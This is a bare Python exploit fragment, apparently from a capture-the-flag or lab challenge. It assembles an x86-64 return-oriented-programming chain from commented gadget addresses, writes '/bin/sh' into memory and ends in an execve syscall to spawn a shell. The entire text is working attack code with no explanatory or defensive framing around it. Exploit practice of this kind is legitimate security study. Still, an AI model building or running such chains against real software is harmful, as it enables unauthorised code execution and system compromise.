payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x453095)+p64(0x43d189)
# 0x000000000043d189: pop rbx; ret 0; 
payload += p64(0x6e69622f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x453099)+p64(0x43d189)
# 0x000000000043d189: pop rbx; ret 0; 
payload += p64(0x68662f)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40d6f6)
# 0x40d6f6: pop rsi ; retf 2
payload += p64(0x0)+p32(0x43e9ca)+p32(0x33)+"\x00"*2
# 0x000000000043e9ca: pop rdx; ret 0; 
payload += p64(0x453058)+p64(0x44206c)
# 0x000000000044206c: xchg edx, eax; ret; 
payload += p64(0x426209)
# 0x0000000000426209: xchg edi, eax; ret; 
payload += p64(0x43e9ca)
# 0x000000000043e9ca: pop rdx; ret 0; 
payload += p64(0x3b)+p64(0x44206c)
# 0x000000000044206c: xchg edx, eax; ret; 
payload += p64(0x43e9ca)
# 0x000000000043e9ca: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x40cd05)
# 0x000000000040cd05: syscall; 
payload += b''
